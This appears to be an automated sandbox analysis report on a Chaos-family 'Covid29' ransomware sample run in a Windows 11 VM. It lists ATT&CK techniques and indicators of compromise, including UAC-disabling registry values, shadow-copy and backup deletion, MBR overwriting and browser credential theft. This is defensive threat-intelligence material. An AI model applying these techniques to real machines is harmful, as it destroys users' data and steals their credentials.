chaos | hxxp://roblox[.]com

Analysis

max time kernel
411s
max time network
417s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
29-01-2025 18:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://roblox.com

Score

10^/10

chaos bootkit defense_evasion discovery evasion execution impact persistence ransomware spyware stealer trojan upx

Malware Config

Signatures

Chaos
Ransomware family first seen in June 2021.
ransomware chaos

Chaos Ransomware 6 IoCs

resource	yara_rule
behavioral1/files/0x001900000002af83-3842.dat	family_chaos
behavioral1/memory/1320-3844-0x00000000006C0000-0x00000000006E0000-memory.dmp	family_chaos
behavioral1/memory/2828-3845-0x0000000000400000-0x00000000005D5000-memory.dmp	family_chaos
behavioral1/memory/5540-3947-0x0000000000400000-0x00000000005D5000-memory.dmp	family_chaos
behavioral1/memory/5540-3950-0x0000000000400000-0x00000000005D5000-memory.dmp	family_chaos
behavioral1/memory/2828-3955-0x0000000000400000-0x00000000005D5000-memory.dmp	family_chaos

Chaos family
chaos

UAC bypass 3 TTPs 6 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
876	bcdedit.exe
5208	bcdedit.exe

Deletes backup catalog 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command and Scripting Interpreter

T1059

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
6092	wbadmin.exe

Disables Task Manager via registry modification
defense_evasion

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\covid29-is-here.txt	svchost.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	svchost.exe

Executes dropped EXE 12 IoCs

pid	Process
2160	mbr.exe
1320	Cov29Cry.exe
5168	mbr.exe
6112	Cov29Cry.exe
2692	svchost.exe
4080	svchost.exe
5472	Cov29LockScreen.exe
5312	Cov29LockScreen.exe
5916	TrojanRansomCovid29.exe
3856	mbr.exe
4696	Cov29Cry.exe
1372	svchost.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Drops desktop.ini file(s) 34 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	svchost.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	svchost.exe
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-3587106988-279496464-3440778474-1000\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	svchost.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini	svchost.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	svchost.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	svchost.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	svchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
425	raw.githubusercontent.com
545	raw.githubusercontent.com

Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	mbr.exe
File opened for modification	\??\PhysicalDrive0	mbr.exe
File opened for modification	\??\PhysicalDrive0	mbr.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\cbp2s24yy.jpg"	svchost.exe

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/5540-3819-0x0000000000400000-0x00000000005D5000-memory.dmp	upx
behavioral1/memory/2828-3845-0x0000000000400000-0x00000000005D5000-memory.dmp	upx
behavioral1/memory/5540-3947-0x0000000000400000-0x00000000005D5000-memory.dmp	upx
behavioral1/memory/5540-3950-0x0000000000400000-0x00000000005D5000-memory.dmp	upx
behavioral1/memory/2828-3955-0x0000000000400000-0x00000000005D5000-memory.dmp	upx
behavioral1/files/0x0002000000029772-3962.dat	upx
behavioral1/memory/5916-4115-0x0000000000400000-0x00000000005D5000-memory.dmp	upx

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 5 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (5)\source\Cov29LockScreen\Cov29LockScreen.exe:Zone.Identifier	explorer.exe
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (5)\TrojanRansomCovid29.exe:Zone.Identifier	explorer.exe
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (5)\source\Cov29LockScreen.exe:Zone.Identifier	explorer.exe
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (5)\source\Bat To Exe Converter\Bat_To_Exe_Converter.exe:Zone.Identifier	explorer.exe
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (5)\source\Cov29Cry\Chaos Ransomware Builder v4.exe:Zone.Identifier	explorer.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 46 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Cov29LockScreen.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mbr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	shutdown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mbr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TrojanRansomCovid29.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mbr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TrojanRansomCovid29.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	shutdown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TrojanRansomCovid29.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Cov29LockScreen.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	shutdown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5412	PING.EXE
5524	PING.EXE
3024	PING.EXE
2916	PING.EXE
4968	PING.EXE
776	PING.EXE

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	vds.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
2436	vssadmin.exe

Kills process with taskkill 2 IoCs

defense_evasion

pid	Process
3076	taskkill.exe
3540	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Internet Explorer\Toolbar	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	explorer.exe

Modifies registry class 43 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616209"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{088e3905-0323-4b02-9826-5d99428e115f}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings	cmd.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\MuiCache	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings	cmd.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	explorer.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3587106988-279496464-3440778474-1000\{DE992C15-208A-42F0-90E3-8878802FF356}	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 010000000000000002000000ffffffff	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 000000000100000002000000ffffffff	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	explorer.exe

Modifies registry key 1 TTPs 21 IoCs

Modify Registry

T1112

pid	Process
5292	reg.exe
5760	reg.exe
2816	reg.exe
2044	reg.exe
5260	reg.exe
2268	reg.exe
5284	reg.exe
4828	reg.exe
3708	reg.exe
5396	reg.exe
876	reg.exe
5544	reg.exe
3796	reg.exe
2916	reg.exe
4788	reg.exe
2280	reg.exe
1200	reg.exe
5508	reg.exe
868	reg.exe
1944	reg.exe
3740	reg.exe

NTFS ADS 31 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (5)\source\Cov29Cry\AdvancedOptions.PNG:Zone.Identifier	explorer.exe
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (5)\source\Cov29Cry\bg.jpg:Zone.Identifier	explorer.exe
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (5)\source\Cov29LockScreen\Form1.frm:Zone.Identifier	explorer.exe
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (5)\source\Cov29Cry.exe.death:Zone.Identifier	explorer.exe
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (5)\source\mbr.cpp:Zone.Identifier	explorer.exe
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (5)\source\icon.ico:Zone.Identifier	explorer.exe
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (5)\source\Cov29Cry\Chaos Ransomware Builder v4.exe:Zone.Identifier	explorer.exe
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (5)\source\Cov29Cry\Options.PNG:Zone.Identifier	explorer.exe
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (3).zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (5)\source\Bat To Exe Converter\help.chm:Zone.Identifier	explorer.exe
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (5)\source\Cov29Cry\Cov29Cry.exe.death:Zone.Identifier	explorer.exe
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (5)\source\Bat To Exe Converter\Bat_To_Exe_Converter.exe:Zone.Identifier	explorer.exe
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (5)\source\mbr.exe.danger:Zone.Identifier	explorer.exe
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (5)\source\TrojanRansomCovid29.bat:Zone.Identifier	explorer.exe
File opened for modification	C:\Users\Admin\Downloads\Covid29 Ransomware (5)\source\Cov29Cry\covid29-is-here.txt:Zone.Identifier	explorer.exe
